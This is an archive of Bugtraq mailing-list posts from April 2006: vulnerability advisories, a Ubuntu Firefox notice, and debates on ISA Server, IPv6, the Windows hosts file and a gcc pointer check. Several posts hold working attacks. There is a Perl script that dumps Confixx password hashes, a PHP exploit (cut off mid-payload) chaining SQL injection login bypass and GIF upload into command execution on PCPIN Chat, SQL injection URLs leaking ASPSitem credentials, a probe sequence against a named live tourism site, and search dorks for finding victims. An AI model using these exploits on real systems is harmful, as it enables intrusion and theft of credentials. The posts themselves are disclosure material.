ASPSitem <= 1.83 Remote SQL Injection Vulnerability

2006-04-19 Thread Mustafa Can Bjorn IPEKCI

--Security Report--
Advisory: ASPSitem <= 1.83 Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 19/04/06 19:33 PM
---
Contacts:{
ICQ: 10072
MSN/Email: [EMAIL PROTECTED]
Web: http://www.nukedx.com
}
---
Vendor: ASPSitem (http://www.aspsitem.com)
Version: 1.83 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to id 
parameter in Haberler.asp
Level: Critical
Solution: Upgrade your ASPSitem version to 2.0
---
How&Example: 
GET -> http://[victim]/[ASPSitemDir]/Haberler.asp?haber=devam&id=[SQL]
EXAMPLE -> 

http://[victim]/[ASPSitemDir]/Haberler.asp?haber=devam&id=-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,
kayittarih,email%20FROM%20uyeler%20where%20id%20like%201
with this example remote attacker can leak userid 1's login information from 
database.
---
Timeline:
* 19/04/2006: Vulnerability found.
* 19/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=23
---
Dorks: "Teþekkür ASPSitem"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=23


Strengthen OpenSSH security?

2006-04-19 Thread Brett Glass
I'm sure that most folks with hosts that expose an OpenSSH daemon 
to the Internet have been getting the usual probes and password 
guessing attempts and have been taking appropriate actions (e.g. 
setting AllowUsers and using strong passwords) to protect 
yourselves. But today, on one of my servers, I noticed a new trend: 
the attackers are getting smarter. Apparently, they can tell the 
difference between a user ID which is not named in an AllowUsers 
directive -- or which does not exist at all -- from one for which 
they just haven't guessed the correct password. I've now watched as 
some attackers (but not all... yet) tried various user IDs, noted 
which ones existed and were in AllowUsers, and focused password 
guessing attacks on just those user IDs.


It seems to me that sshd should not tip its hand by returning 
different responses when a user ID can be used for logins than when 
it can't -- allowing an attacker to focus password guessing attacks 
on user IDs with which it would have a chance of gaining access. 
For those folks out there who are more familiar with OpenSSH than I 
am: How hard would it be to make the responses indistinguishable?


--Brett Glass



[USN-271-1] Firefox vulnerabilities

2006-04-19 Thread Martin Pitt
===
Ubuntu Security Notice USN-271-1 April 19, 2006
mozilla-firefox, firefox vulnerabilities
CVE-2005-4134, CVE-2006-0292, CVE-2006-0296, CVE-2006-0749,
CVE-2006-1727, CVE-2006-1728, CVE-2006-1729, CVE-2006-1730,
CVE-2006-1731, CVE-2006-1732, CVE-2006-1733, CVE-2006-1734,
CVE-2006-1735, CVE-2006-1736, CVE-2006-1737, CVE-2006-1738,
CVE-2006-1739, CVE-2006-1740, CVE-2006-1741, CVE-2006-1742,
CVE-2006-1790
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

firefox
mozilla-firefox

The problem can be corrected by upgrading the affected package to
version 1.0.8-0ubuntu4.10 (for Ubuntu 4.10), 1.0.8-0ubuntu5.04 (for
Ubuntu 5.04), or 1.0.8-0ubuntu5.10 (for Ubuntu 5.10).  After a
standard system upgrade you need to restart Firefox to effect the
necessary changes.

Details follow:

Web pages with extremely long titles caused subsequent launches of
Firefox browser to hang for up to a few minutes, or caused Firefox to
crash on computers with insufficient memory. (CVE-2005-4134)

Igor Bukanov discovered that the JavaScript engine did not properly
declare some temporary variables. Under some rare circumstances, a
malicious website could exploit this to execute arbitrary code with
the privileges of the user. (CVE-2006-0292, CVE-2006-1742)

The function XULDocument.persist() did not sufficiently validate the
names of attributes. An attacker could exploit this to inject
arbitrary XML code into the file 'localstore.rdf', which is read and
evaluated at startup. This could include JavaScript commands that
would be run with the user's privileges. (CVE-2006-0296)

Due to a flaw in the HTML tag parser a specific sequence of HTML tags
caused memory corruption. A malicious web site could exploit this to
crash the browser or even execute arbitrary code with the user's
privileges. (CVE-2006-0749)

Georgi Guninski discovered that embedded XBL scripts of web sites
could escalate their (normally reduced) privileges to get full
privileges of the user if that page is viewed with "Print Preview".
(CVE-2006-1727)

The crypto.generateCRMFRequest() function had a flaw which could be
exploited to run arbitrary code with the user's privileges.
(CVE-2006-1728)

Claus Jørgensen and Jesse Ruderman discovered that a text input box
could be pre-filled with a filename and then turned into a file-upload
control with the contents intact. A malicious web site could exploit
this to read any local file the user has read privileges for.
(CVE-2006-1729)

An integer overflow was detected in the handling of the CSS property
"letter-spacing". A malicious web site could exploit this to run
arbitrary code with the user's privileges. (CVE-2006-1730)

The methods valueOf.call() and .valueOf.apply() returned an object
whose privileges were not properly confined to those of the caller,
which made them vulnerable to cross-site scripting attacks. A
malicious web site could exploit this to modify the contents or steal
confidential data (such as passwords) from other opened web pages.
(CVE-2006-1731) The window.controllers array variable (CVE-2006-1732)
and event handlers (CVE-2006-1741) were vulnerable to a similar attack. 

The privileged built-in XBL bindings were not fully protected from web
content and could be accessed by calling valueOf.call() and
valueOf.apply() on a method of that binding. A malicious web site
could exploit this to run arbitrary JavaScript code with the user's
privileges. (CVE-2006-1733)

It was possible to use the Object.watch() method to access an internal
function object (the "clone parent"). A malicious web site could
exploit this to execute arbitrary JavaScript code with the user's
privileges. (CVE-2006-1734)

By calling the XBL.method.eval() method in a special way it was
possible to create JavaScript functions that would get compiled with
the wrong privileges. A malicious web site could exploit this to
execute arbitrary JavaScript code with the user's privileges.
(CVE-2006-1735)

Michael Krax discovered that by layering a transparent image link to
an executable on top of a visible (and presumably desirable) image a
malicious site could fool the user to right-click and choose "Save
image as..." from the context menu, which would download the
executable instead of the image. (CVE-2006-1736)

Several crashes have been fixed which could be triggered by web sites
and involve memory corruption. These could potentially be exploited to
execute arbitrary code with the user's privileges. (CVE-2006-1737,
CVE-2006-1738, CVE-2006-1739, CVE-2006-1790)

If the user has turned on the "Entering secure site" modal warning
dialog, it was possible to spoof the browser's secure-site indicators
(the lock icon and the gold URL field background) by first loading the
target secure site in a pop-up window, t

PCPIN Chat <= 5.0.4 "login/language" remote cmmnds xctn

2006-04-19 Thread rgod
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "-> works with magic_quotes_gpc = Off\r\n";
echo "dork: \"powered by PCPIN.com\"\r\n\r\n";

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host:  target server (ip/hostname)\r\n";
echo "path:  path to pcpin\r\n";
echo "cmd:   a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /pcpin/ cat ./config/db.inc.php\r\n";
echo "php ".$argv[0]." localhost /pcpin/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
die;
}

/*
   software site: http://www.pcpin.com/
   description: a chat software written in php that uses mysql for data storage

   vulnerabilites:
   i) sql injection:
   you can login as admin typing:
   username: ") or isnull(1/0)/*
   password: [whatever]

   query becomes:
   SELECT * FROM pcpin_user WHERE (cookie = "#EMPTY#" AND cookie <> "") OR
   (login = "") or isnull(1/0)/* AND password = "[somehash]") AND activated = 
"1"
   LIMIT 1

   ii) arbitrary local inclusion:
   now you can upload smilies with php code inside, we have a local inclusion
   bug in "language" argument when you select a language so, you can include
   a gif file and launch commands...

   both works with magic_quotes_gpc=Off
  */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
  echo 'No response from '.$host.':'.$port; die;
}
  }
  else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
  echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
  echo 'No response from proxy...';die;
}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
$html='';
while (!feof($ock)) {
  $html.=fgets($ock);
}
  }
  else {
$html='';
while ((!feof($ock)) or 
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  $html.=fread($ock,1);
}
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 10);
}

$host=$argv[1];
$path=$argv[2];
$cmd="";$port=80;$proxy="";

for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the 
path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}


#step 1 -> sql injection, login as admin
echo "[1] login...\r\n";
$sql="\") or isnull(1/0)/*";
$sql=urlencode($sql);
$data ="lostpassword=";
$data.="&include=2";
$data.="&language=english";
$data.="&submitted=1";
$data.="&login=".$sql;
$data.="&password=suntzu";
$packet ="POST ".$p."main.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);
$cookie=$temp2[0];
if ($cookie =='') {die("Unable to retrieve session cookie...");}
echo "Cookie -> ".$cookie."\r\n";
$temp=explode("name=\"session_id\" value=\"",$html);
$temp2=explode("\"",$temp[1]);
$sid=$temp2[0];
if ($sid =='') {die("Unable to retrieve session id...");}
echo "session id -> ".$sid."\r\n";

srand(make_seed());
$v = rand(1,9);

#step 2 -> Upload a malicious gif file...
echo "[2] uploading the gif file...\r\n";
$data='-7d613b1d0448
Content-Disposition: form-data; name="smiliefile"; filename="suntzu.gif"
Content-Type: image/gif


-7d613b1d0448
Content-Disposition: form-data; name="session_id";

'.$s

[eVuln] N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities

2006-04-19 Thread alex
New eVuln Advisory:
N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities
http://evuln.com/vulns/121/summary.html

Summary
eVuln ID: EV0121
CVE: CVE-2006-1657 CVE-2006-1658
Vendor: Chucky A. Ivey
Software: N.T.
Sowtware's Web Site: http://www.v-gfx.net/
Versions: 1.1.0
Critical Level: Dangerous
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
PoC/Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

-Description---
1. Cross-Site Scripting

Vulnerable Script: index.php

Parameter username is not properly sanitized. This can be used to post 
arbitrary HTML or web script code. This code will be executed when 
administrator will visit "Login Log" page.

Administrator's session is threatened.


2. PHP Code Insertion

Administrator has an ability to edit variables in ticker.db.php file. Script 
dont make any sanitation of entered values. This can be used to insert 
arbitrary PHP code.

System access is possible.


--PoC/Exploit--
Available at: http://evuln.com/vulns/121/exploit.html

--Solution-
No Patch available.

--Credit---
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)


Regards,
Aliaksandr Hartsuyeu
http://evuln.com - Penetration Testing Services
.


SQL Injection in incredibleindia.org

2006-04-19 Thread susam_pal
Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp

Found By: Susam Pal

Found On: 29th March, 2006, Wednesday

Vulnerability Type: SQL Injection

Action Taken: Reported to [EMAIL PROTECTED]

Description:

www.incredibleindia.org is a tourism website. The site is prone to SQL 
injection which can be exploited to reveal the table 

names, some column names as well as their data types. Exploiting the 
vulnerability requires some reverse engineering. The ASP 

ODBC error messages can be displayed by passing bad values for the parameters 
in the URL.


Example URL 1: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828'

Error Found: Unclosed quotation mark before the character string ' and 
mncpage.mnccategoryid = mnccategory.mnccategoryid'. 

Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and 
'mnccategory'. Both of them have a column 

called 'mnccategoryid'.


Example URL 2: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 
order by 1--
Example URL 3: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 
order by 2--
Example URL 4: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 
order by 3--

Error Found: None


Example URL 5: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 
order by 4--

Error Found: The ORDER BY position number 4 is out of range of the number of 
items in the select list.

Conclusion: The table being used by the query selects 3 columns and one of them 
is an integer.


Example URL 6: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 
union select 'varchar1', 'varchar2', 'varchar3' 

from mncpage--

Error Found: Syntax error converting the varchar value 'varchar1' to a column 
of data type int.

Conclusion: The 1st column in the select query is an integer.


Error URL 7: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 
union select mnccategoryid, 'varchar2', 

'varchar3' from mncpage--

Error Found: None

Conclusion: The column 'mnccategory' is of integer type.


Re: Re[2]: Bypassing ISA Server 2004 with IPv6

2006-04-19 Thread Christine Kronberg

On Sat, 15 Apr 2006, Thor (Hammer of God) wrote:


ISA Server is an application that is installed on top of the base OS. Are
you suggesting that the application should actually prevent the local
administrator of the host machine from installing and configuring what
protocols are bound to what adapters?


  No, I'm suggesting that the application should enable the local
  administrator to configure that application. Configuring a firewall
  is a bit more than setting a domain name. It must contain some
  (preferebly reasonable) filtering mechanisms.
  From what is said so far this seems not to be possible. If that is
  true, ISA is broken by design. We are talking about a firewall. A
  firewall that cannot filter is not a firewall. Agreed?


To me, *that* is the borderline.  There is no such thing as "for what ever
reason ipv6 in enabled on ISA" when it comes to administering an enterprise
firewall product.  If an administrator installs configures ipv6 on the OS of
the firewall, and then binds ipv6 to a protected network segment, then they
absolutely, positively, without-a-doubt get exactly what they deserve.


  Do you think the same applies to ipv4? I said "for what ever reason ipv6
  in enabled on ISA" because I am definitely not in the position to guess
  all possible reasons for activating ipv6.


Anyone who does that without understanding what they are doing are simply
taking jobs away from competent, knowledgeable administrators.


  You are speaking out of my deepest heart. Anyhow, you are aware that
  it is not always the incompentent admin; sometimes it is the incompetent
  superior and not every admin has the nerv and the backing to say no
  to idiotic orders by management.


The mindset of "protecting the ignorant administrator from themselves" in
this business has got to end.  Positioning this as if there is some flaw in


  Definitely.


ISA because the application does not prohibit a local administrator from
binding unsupported protocols to interfaces is simply ludicrous. In fact, it


  I still fail to see why an unsupported protocol goes through anyway.
  The reason for implementing a firewall is to separate networks with
  different trust levels. Not to connect them wide open. For this any
  router will do.


is the opposite that is true:  If I as an administrator of a machine want to
bind a protocol to an adapter for some reason (as in a separate, private
segment for use in a particular environment) then I should, indeed MUST, be
able to do it.  And I will be responsible for the implications of doing so.


  Sure. But even in a protected enviroment you may want some additional
  restrictions.


There was an earlier thread today where a simple list of hostnames being
filtered from the Win32 HOSTS file was positioned as "deliberate sabotage"
of our machines by Microsoft; a case of "It's my computer- keep your hands
off."  Yet here, the integrity of a product is being challenged because the
application does not prevent an administrator from installing and binding
protocols at the OS-level in cases where the application is not designed to
filter those protocols?  That is a double-standard at its best.


  Again: If that application is a firewall it's a must to be able to
  filter. Anything else is not logical.
  If the application is some funny network gaming tool, then I heartly
  agree.

  Cheers,

  Christine Kronberg.




Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-19 Thread Jamie Riden
On 14/04/06, Brandon S. Allbery KF8NH <[EMAIL PROTECTED]> wrote:
>
> On Apr 13, 2006, at 1:29 , Dave Korn wrote:
>
> >   Hey, guess what I just found out:  Microsoft have deliberately
> > sabotaged
> > their DNS client's hosts table lookup functionality.
>
> I thought this was part of avoiding malware attempts to block Windows
> Update.

In that case, they should allow us to add symantec et al - it's not
much use having Windows Update working while the machine is happily
rootkitted. Grepping hosts files across campus for 127.0.0.1 ...
liveupdate.symantec.com  - or your local equivalent - can prove
interesting.

If it was a feature, I'd expect there to be ways to add to the list of
pass-through domains, or ways to disable it.

cheers,
 Jamie
--
Jamie Riden / [EMAIL PROTECTED] / [EMAIL PROTECTED]
"Microsoft: Bringing the world to your desktop - and your desktop to
 the world." -- Peter Gutmann


Re: Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup

2006-04-19 Thread somerandomaddress99
FYI: go.microsoft.com is used to point to security bulletins.

In fact, all the domains listed with the exception of MSN.com are used in the 
Windows and Office patching process.


[eVuln] MD News Authentication Bypass and SQL Injection Vulnerabilities

2006-04-19 Thread alex
New eVuln Advisory:
MD News Authentication Bypass and SQL Injection Vulnerabilities
http://evuln.com/vulns/120/summary.html

Summary
eVuln ID: EV0120
Software: MD News
Sowtware's Web Site: http://www.matthewdingley.co.uk/
Versions: 1
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
PoC/Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

-Description---
1. SQL Injection.

Vulnerable script: admin.php

Parameter id is not properly sanitized before being used in SQL query. This can 
be used to make any SQL query by injecting arbitrary SQL code.


2. Authentication Bypass.

"Administration Area" script has no any authentication. Any user can get access 
to administrator's area. (Just need to know script name)


--PoC/Exploit--
Available at: http://evuln.com/vulns/120/exploit.html

--Solution-
No Patch available.

--Credit---
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)


Regards,
Aliaksandr Hartsuyeu
http://evuln.com - Penetration Testing Services
.


Re[3]: Bypassing ISA Server 2004 with IPv6

2006-04-19 Thread Christine Kronberg


  Dear 3APA3A,



Microsoft  ISA  Server  can't  filter  events  from Microsoft Mouse, but


  Apples and peas?


Microsoft Mouse can be bound to computer. It's security risk, but I know
how to secure mouse without ISA and I accept this risk.


  Nice, that you do. If I manage by any means to see remotely
  that you have attached a mouse to your ISA and to (ab)use it,
  I'm much better that I thought - and you have much bigger problems
  than you thought.
  The nice thing about icmp is that I do not require much knowledge
  to get information remotely. Same true with ipv6. Unless something
  in between stops me. Which brings us back to the topic: a firewall
  allowing too much.


IPv6  can  not  be  filtered  by  ISA,  but  it still can be filtered by
different  tools,  or  by  it's own means, as IPv6 support network-level
security.  Unlike IPv4, IPv6 supports authentication, integrity checking
and  encryption  natively.  See ipsec6.exe and descriptions for Security
Association Batabase and Security Policy Database.


  So you state that it is perfectly well for a firewall to allow
  any traffic through. Per default? And that this firewall does not
  need to have the interface to configure what traffic is allowed?
  I disagree.
  If a firewall supports a protocol, that same firewall should also
  provide the proper means and interface to configure it. And not blow
  holes in networks.

  Cheers,

  Christine Kronberg.




EasyGallery Cross-Site Scripting

2006-04-19 Thread botan
Website : www.wingnut.net.ms
Author : Botan
Credits : B3g0k,Nistiman,flot,Netqurd
Original Advisory : 

http://advisory.patriotichackers.com/index.php?itemid=5

Description : "EasyGallery is a simple web-photogallery with a maximum of 
user-friendlyness. All you have to do is to upload your photos and the 
EasyGallery files onto your webspace"

XSS code :

http://www.site.com/[path]/EasyGallery.php?ordner=XSS 


Confixx SQL Injection exploit (confixx_exploit.pl)

2006-04-19 Thread defa

Well - the patch is out - here is the exploit.

Hey - German hosters - if you call yourself "serverkompetenz.de" -  
why don't you fix your servers?


sincerly
defa

BOF
#!/usr/bin/perl

 


#  #
# exploit for confixx professional <= 3.1.2 #
#  #
# the vulerability was discovered by: LoK Crew #
# references: http://www.securityfocus.com/bid/17476   #
#  #
# exploit can be used for any purpose but on own risk  #
#  #
# (c) by defa - sorry for the crappy code  #
#  #
# url is just the host - directory is $url/user/index.php by default  
	   #
# the exploit just fetches the longpw hashes of alle  
users #

#  #
# parts of the code are stolen from RuSH exploits - thanks a lot  
folks	   #
 



use IO::Socket;

if (@ARGV < 1)
{
print q(
exploit by defa (2006)
=
confixx_exploit.pl [URL]

params:
[URL] - server url

example: confixx_exploit.pl 127.0.0.1
);
exit;
}

$serv  = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;

for ($i=0;$i<=100;$i++)
{
$hit = 0;
$url = "http://";;
$url .= $serv;
$url .= "/user/index.php?SID=1'%20AND%200=1%20UNION%20SELECT%20CONCAT";
$url .= "('_error|s:',length(longpw)%2Blength(kunde)%2B11,':%22','HIT: 
%20',";
$url .= "kunde,'%20:%20',longpw,'%20:%20','%22;')%20AS%20'sdata'% 
20FROM%20";

$url .= "kunden%20LIMIT%20";
$url .= "$i,1/*";

$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "80") || die "[-] CONNECT FAILED\r\n";


print  $socket "GET $url HTTP/1.1\n";
print  $socket "Host: $serv\n";
print  $socket 'User-Agent: confixx_exploit'."\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
if ($answer =~ /HIT:/)
{
@result = split(/: /,$answer);

print "$result[1]: $result[2]\n";
$hit = 1;
}

}
if ($hit == 0) {die("that's it");}
}

EOF
--
don't eat yellow snow





Re: Re[2]: Bypassing ISA Server 2004 with IPv6

2006-04-19 Thread Thor (Hammer of God)
ISA Server is an application that is installed on top of the base OS. Are
you suggesting that the application should actually prevent the local
administrator of the host machine from installing and configuring what
protocols are bound to what adapters?

To me, *that* is the borderline.  There is no such thing as "for what ever
reason ipv6 in enabled on ISA" when it comes to administering an enterprise
firewall product.  If an administrator installs configures ipv6 on the OS of
the firewall, and then binds ipv6 to a protected network segment, then they
absolutely, positively, without-a-doubt get exactly what they deserve.
Anyone who does that without understanding what they are doing are simply
taking jobs away from competent, knowledgeable administrators.

The mindset of "protecting the ignorant administrator from themselves" in
this business has got to end.  Positioning this as if there is some flaw in
ISA because the application does not prohibit a local administrator from
binding unsupported protocols to interfaces is simply ludicrous. In fact, it
is the opposite that is true:  If I as an administrator of a machine want to
bind a protocol to an adapter for some reason (as in a separate, private
segment for use in a particular environment) then I should, indeed MUST, be
able to do it.  And I will be responsible for the implications of doing so.

There was an earlier thread today where a simple list of hostnames being
filtered from the Win32 HOSTS file was positioned as "deliberate sabotage"
of our machines by Microsoft; a case of "It's my computer- keep your hands
off."  Yet here, the integrity of a product is being challenged because the
application does not prevent an administrator from installing and binding
protocols at the OS-level in cases where the application is not designed to
filter those protocols?  That is a double-standard at its best.

t


On 4/10/06 12:34 PM, "Christine Kronberg" <[EMAIL PROTECTED]> spoketh to all:

>Thanks for clearing that. But: If ISA is not able to filter IPv6 so
>why can it be bound to an interface anyway? Just to route things
>through? Blindly through a firewall?
>Another posting talks about limited filtering capabilities. Roman
>wrote, icmp went through. So where is the borderline? It still seems
>to me that in the moment for what ever reason ipv6 is enabled on ISA
>the network it should secure is exposed.
> 
>Cheers,
> 
>Christine Kronberg.




Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread Geo.
> I agree that there should have been better documentation of this, but I
> think the noted objections are a bit hyperbolic.

While I don't disagree with what you said, I think there are some things you
didn't consider.

First, why is anything besides what is required for windows update being
bypassed? Why MSN.COM? Why NOT Symantec.com? I mean this looks more like a
way to keep passport functional than as a way to foil trojans.

Second, why is it that it's darn near impossible to screw with media player
or Messenger (both are protected by Windows file protection) yet hosts file
changes don't even popup a dialog box to ask the user if the change is ok? I
mean this is a really sneaky way of "fixing" things. Also before you say WFP
or a popup could be disabled by a trojan, so could this fix.

Third, this appears to me to be just more half witted fixes imo. The problem
is a trojan modifying hosts then fix the problem instead of ignoring hosts.
Provide a locking mechanism for hosts, remove the trojan, there are a
hundred ways to fix this that are far more proper ways to do things than
this.

Geo.



Re: gcc 4.1 bug miscompiles pointer range checks, may place you at risk

2006-04-19 Thread Nate Eldredge

On Mon, 17 Apr 2006, Felix von Leitner wrote:


I wrote a small library of functions to do typical range checks as they
are needed in code that handles incoming packets or messages from
untrusted sources.  My impetus was SMB code, in case you want to know.

Here is one of my functions:

static inline int range_ptrinbuf(const void* buf,unsigned long len,const void* 
ptr) {
 register const char* c=(const char*)buf;  /* no pointer arithmetic on 
void* */
 return (c && c+len>c && (const char*)ptr-cc" is the code with which you would
typically check for integer overflows, which is a check that for example
an IP stack would do, or Samba.  So, if you compiled your kernel with
gcc 4.1, or your Samba, or some other packet handling code in a security
relevant context, you might want to recompile with gcc 3.


Hi,

This is interesting.  But I am not sure that it is really a compiler bug. 
Rules for pointer arithmetic in C are rather restrictive, and stepping 
outside of them results in "undefined behavior".  I don't have the current 
ANSI C standard available, but even my old copy of K&R I says that you 
shouldn't compare pointers which point to different arrays, or you may get 
nonsense.  So I have a suspicion that this code may be illegal, and the 
different compiler versions just happen to have chosen different 
interpretations.


In fact, in some sense the new result is correct.  What if buf is an array 
of size 2^32?  Then buf + 0xU does in fact point to an element of 
buf beyond the 0th, so 'buf + 0xU > buf' is in that sense a true 
statement.  Of course, no existing x86 operating system is set up to work 
like that, but the compiler doesn't know that.


I guess a more general question is "if q is a pointer, and buf is an array 
of size n, how to tell if q points to an element of buf?"  You would like 
to be able to do


q >= buf && q < buf+n

but I think maybe this is not right.  In fact, on a machine with very 
crazy memory management, it might be very difficult or impossible to 
answer that question.


I guess the correct test is not to try to apply the test to the pointer 
but to the index.  E.g. if given an untrusted index i, rather than letting 
q=buf+i and then trying to validate q, just remember the value for i and 
check whether i >= 0 && i <= n.  That seems foolproof to me.


You might want to bring this up on a forum like comp.lang.c where people 
know a lot about the C language.  Alternatively, if you've already 
reported this as a bug to the gcc maintainers (which of course you would 
do before posting to bugtraq, right? :), they will probably be able to 
explain what's going on.


In any case, it's useful to know about this, if nothing else so that 
people know to avoid code like that.  Thanks for bringing it up.


--
Nate Eldredge
[EMAIL PROTECTED]


Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread somebody
Just take a binary editor to dnsapi.dll and change the strings to .ccc instead 
of .com

That should fix it, until the next update cycle.


RE: redirection vuln crawlers breed & security through obscurity

2006-04-19 Thread Evans, Arian
1. This is definitely a pretty common, if not well-known
problem, being "broken access control" that relies on
obscurity or something weak/trivial to forge (like an
HTTP refer field path) to control access to an entry
point in a webapp. Sometimes, no further authorization
checks are made (on pages/functions behind the entrypoint).

2. Tools already exist that allow you to manually ignore
redirects per your question blow, and some do this automatically.
www.owasp.org and www.webappsec.org are good places to start.

3. This said, "how secure?" in this case is a math problem.
Given you know the directory structure, if all you are doing
is trying to brute-force enumerate the file name, then all
you have is a fuzzing problem plus HTTP requests/sec rate
(that is realistic to achieve).

If your admin default page is "supersexysecretsignon.php"
I can turn a fuzzer lose on this until I get an HTTP 200 OK,
or a change in body content, and automatically flag the page.

In the case above, I have 21 characters to fuzz plus an
page extension, so (21^27 * [$.extensions]) to work through.

I could fuzz *everything* or be lazy and fuzz a variable
and tack on a list of say 10 well-known extensions to each
iteration of the variable.

Assuming I do not know the page name, let's take 50 chars
ASCII/numeric, assume it is case-sensitive on *nix, so you
would have 50^64 possible combinations starting at "a".
Then multiply that times the number of extensions you want
to try, unless you want to fuzz those characters too.

How fast you could work through that keyspace is a good
question. I recommend you Google for Mike Shema's work
on session token entropy from RSA '05 and later, and
he has excellent tables on 'n' HTTP/req/sec = $work_time
to exhaust a given keyspace, which is exactly what you
are essentially asking here I believe.

Excellent questions, again. Two good mailing lists to ask
these sorts of questions on are:

[EMAIL PROTECTED]
[EMAIL PROTECTED]

Double-check my math. I haven't my coffee today, adding
to my native processor's already unfortunate tendency to
introduce random floating-point error into my ad-hoc calculations,

Arian J. Evans
FishNet Security

Note: Microsoft Office breaks text-based emails by default.
To see text messages properly formatted, turn off:
Tools>Options>|Email Options|+Remove Extra Line Breaks

816.421.6611 [fns office]
816.701.2045 [direct]
888.732.9406 [fns toll-free]
816.421.6677 [fns general fax]
913.710.7085 [mobile] <--best bet
[EMAIL PROTECTED] [email]

http://www.fishnetsecurity.com



> -Original Message-
> From: Ivan Sergio Borgonovo [mailto:[EMAIL PROTECTED] 
> Sent: Saturday, April 15, 2006 7:47 AM
> To: bugtraq@securityfocus.com
> Subject: redirection vuln crawlers breed & security through obscurity
> 
> 
> I just came across such kind of code (php) written by a colegue:
> 
> //header.inc
> if($_SESSION['UN']!='hardcoded_UN' or $_SESSION['UN']!='hardcoded_PW')
>   header("Location: ./login.html");
> //missing else to mitigate the problem!!
> //HTML stuff here...
> 
> code structure of all the other "supposed to be" private pages is:
> 
> //wannabeprotected.php
> include_once("include/header.inc")
> //wannabe protected code
> 
> Everything resides at something like:
> http://site/admin/
> 
> of course the ONLY thing you've to do to break into the admin 
> interface is:
> - disable redirection in your preferred browser (w3m)
> - guess the right address and
> - point exactly to it: http://site/admin/index.php or any 
> existing page[1] eg. http://site/admin/killingmesoftly.php
> 
